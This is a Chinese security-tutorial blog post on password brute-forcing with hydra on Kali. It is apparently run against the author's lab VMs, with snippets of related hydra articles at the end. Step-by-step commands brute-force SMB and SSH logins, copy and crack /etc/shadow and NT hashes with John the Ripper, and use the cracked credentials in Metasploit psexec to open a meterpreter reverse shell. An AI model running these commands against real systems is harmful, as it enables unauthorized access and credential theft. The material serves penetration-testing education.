正文

web安全第06讲：密码爆破工具hydra（kali）

大坏蛋^_^  大坏蛋^_^  2022-11-28  670

关键词：

1.1、windows系统口令远程爆破（smb服务，445端口）

命令：hydra -l administrator -P pwd.dic smb://10.211.55.8 -vV -f -e nsr

解析：-l指定用户名，-L指定用户名字典，-p指定密码，-P指定密码字典，-vV显示爆破细节，-o将爆破结果保存到文件，-f只要找到正确密码就停止爆破，-t指定线程数量，默认16，-e（n、s、r）n:null，s:same、r:反向

创建用户名和口令文件：

vim user.dic

vim pwd.dic

暴力破解成功，用户名qin，密码1221

使用永恒之蓝尝试连接：

命令：msfconsole

执行：use exploit/windows/smb/psexec_psh

执行命令：set payload windows/x64/meterpreter/reverse_tcp

执行命令，设置远程目标：set RHOSTS 10.211.55.8

执行命令，设置用户名：set SMBUSER qin

执行命令，设置密码：set SMBPASS 1221

执行命令，设置本机地址：set LHOST 10.211.55.12

执行命令，攻击：exploit

6.2、Linux系统口令远程爆破（ssh服务，22端口）

主要爆破ssh服务

命令：hydra -L user.dic -P pwd.dic sssh://10.211.55.6 -vV -f -t64 -ensr

暴力破解成功，用户名root，密码Aa123123.

6.3、windows系统本地爆破

6.3.1、从内存中读取windows密码

6.3.2、windows的hash值破解（kali）

命令：john win2k8.hash --format-NT --wordlist=/root/dic/winPass.dic

解释：win2k8.hash是存hash的文件，--worldlist可选参数，如果不写就会用默认字典爆破

6.4、Linux系统本地爆破

拷贝shadow文件：cp /etc/shadow ./shadow

命令：john shadow

解析：shadow是拷贝过来的密码文件

命令：john --show shadow

解析：查看破解后的文件

hydra爆破xp登录密码

...p; 使用Hydra爆破XP登录密码准备工具：HydraXP系统一只。物理机一只。Hydra下载地址：链接：http://pan.baidu.com/s/1slq7zRZ密码：zhu5今天我们演示用Hydra爆破虚拟机登录密码。假如我的vmware虚拟机的xp登... 查看详情

渗透工具——hydra破解弱密码(代码片段)

Hydra是一个自动化爆破工具，暴力破解弱密码，是一个支持众多协议的爆破工具，kali中以集成。1.对ssh进行爆破hydra-Luser.txt-Ppassword.txtssh://192.168.3.163-s指定端口hydra-Luser.txt-Ppassword.txtssh://192.168.3.163-s77442.将破解密码保存... 查看详情

渗透工具——hydra破解弱密码(代码片段)

九头蛇--hydra爆破密码实现远程连接登录(代码片段)

Hydra是一个相当强大的暴力密码破解工具。该工具支持几乎所有协议的在线密码破解，如FTP、HTTP、HTTPS、MySQL、MSSQL、Oracle、Cisco、IMAP和VNC等。其密码能否被破解，关键在于字典是否足够强大。下面演示一下hydra的简单实用... 查看详情

渗透工具——hydra破解弱密码(代码片段)

网安神器篇——hydra爆破工具(代码片段)

...#xff1a;不要让时代的悲哀成为你的悲哀专研方向：网络安全，数据结构每日emo：折磨我的，是我那不该有的期待今天给大家分享的神兵利器是一款爆破工具——hydra目录一：hydra简介二：hydra常用命令三&#... 查看详情

经验分享hydra(爆破神器)使用方法

...接-s指定端口-l指定用户名-L指定用户名字典(文件)-p指定密码破解-P指定密码字典(文件)-e空密码探测和指定用户密码探测(ns)-C用户名可以用:分割(username:password)可以代替-lusername-ppassword-o输出文件-t指定多线程数量，默认为16个线程-... 查看详情

网络安全暴力破解工具—九头蛇（hydra）使用详解及实战(代码片段)

目录使用方法案例分析暴破ssh登录密码环境介绍开始爆破破解成功测试登录各种协议破解汇总FTP协议破解http协议破解https协议破解路由器破解http-proxy协议破解smb破解 Windows远程桌面邮箱pop3telnet破解语音通讯工具teamspeakcisco 推荐... 查看详情

使用hydra爆破3389

参考技术A反正Hydra是个暴力破解的神器，这次正好用上那就记录一下kali下自带Hydra，安装过程就不多说了。命令行下输入hydra，效果如下配置好用户名密码然后就点击start就OK了` 查看详情

hydra爆破ssh(代码片段)

目录Centos7开启ssh服务在Kali中生成一个4位数的密码字典用Hydra爆破靶机centos7的密码Centos7开启ssh服务SSH配置看博客查看ssh服务开启状态：systemctlstatussshd.service开启ssh服务：systemctlstartsshd.service检查一下22端口是否开启：... 查看详情

hydra-爆破工具的使用(代码片段)

0x01简介hydra 是一个支持众多协议的爆破工具，在kali上集成，但也可以在windows上下载运行；github上的源码： https://github.com/vanhauser-thc/thc-hydra支持的协议：adam6500、asterisk、cisco、cisco-enable、cvs、firebird、ftp、ftps、http[s]-head|... 查看详情

001-shreder爆破工具(代码片段)

...#xff1a;Shreder工具介绍Shreder是一款功能强大的多线程SSH协议密码爆破工具，类似于hydra这种的爆破工具，但是此工具主要针对ssh进行爆破0x02：项目地址github地址：https://github.com/EntySec/Shreder0x03：安装由于Shreder使... 查看详情

kali下爆破工具hydra如何提速？单个我这一分钟才30次虽然只设置了5线程。

参考技术A增加线程更新版本排除阻塞增强配置另外建议看看《Linux就该这么学》熟悉下命令查看详情

kali系列之hydrassh密码爆破

环境kali192.168.137.131靶机192.168.137.133语句hydra-lroot-P/home/chenglee/zidian/wordlist.TXT-t6ssh://192.168.137.133状态[email protected]:/home/chenglee#hydra-lroot-P/home/chenglee/zidian/wordlist.TXT-t 查看详情

【原创】使用hydra暴力破解网络协议密码

...大，几乎支持所有的协议。本次实验使用Hydra爆破SSH登陆密码；参数说明hydra[[[-llogin|-Lfile][-pPASS|-PFILE]]|[-CFILE]][-ens][-oFILE][-tTASKS][-MFILE[-TTASKS]][-wtime][-f][-sPORT][-S][-vV]serverservice[OPT]-R继续从上一次进度接着破解。-S采用SSL链接。-sPORT... 查看详情

burpsuite简单爆破网站后台密码

...一个高级的工具，执行后，它能自动地发现web应用程序的安全漏洞。Intruder——是一个定制的高度可配置的工具，对web应用程序进行自动化攻击，如：枚举标识符，收集有用的数据，以及使用fuzzing技术探测常规漏洞。Repeater——... 查看详情

nsatp-a学习笔记之day2-6hydra爆破(代码片段)

...发现存在ftp，可以进行爆破爆破ftphydraIPftp-l用户名-P密码字典-t线程(默认16)-vVhydraIPftp-l用户名-P密码字典-ens-vV免责声明本文档供学习，请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不... 查看详情

白帽子讲web安全第六章html5安全

1、新标签的XSS H5中定义类很多新标签、新事件可能带来XSS(为研究XSS攻击H5的变化成立项目----HTML5SecurityCheatsheet) eg: 1) <videosrc="" onloadedmetadate="alter(XSS)"&g 查看详情